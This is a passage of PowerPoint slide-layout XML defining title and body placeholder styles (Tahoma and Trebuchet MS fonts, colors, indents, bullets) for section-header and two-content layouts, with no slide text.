              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 30"/>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區段標題">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="31" name="Shape 31"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963083" y="4406901"/>
            <a:ext cx="10363200" cy="1362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963083" y="2906713"/>
            <a:ext cx="10363200" cy="1500187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 34"/>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兩項物件">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="35" name="Shape 35"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068983" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="1484315"/>
            <a:ext cx="5082115" cy="4611686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-165090" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-126959" lvl="3" marL="1600160" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="–"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-126949" lvl="4" marL="2057349" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-126937" lvl="5" marL="2514537" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-126925" lvl="6" marL="2971726" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-126913" lvl="7" marL="3428914" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-126903" lvl="8" marL="3886103" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
